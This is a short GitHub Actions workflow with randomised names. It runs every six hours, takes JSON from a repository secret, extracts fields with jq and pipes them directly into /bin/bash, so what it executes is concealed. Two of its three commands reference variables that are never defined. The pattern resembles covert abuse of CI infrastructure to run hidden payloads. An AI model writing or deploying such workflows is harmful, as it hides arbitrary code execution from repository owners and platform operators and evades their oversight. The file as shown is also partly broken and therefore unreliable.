name: luoshantou8765

on:
  workflow_dispatch:
  schedule:
    - cron: '43 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luoshantou8765
        env:
          cev64724: ${{ secrets.cev64724 }}
        run: |
          echo $cev64724 | jq -r .hwbp695 | /bin/bash
          echo $q9895 | jq -r .ikp202 | /bin/bash
          echo $gf0 | jq -r .qszz589 | /bin/bash

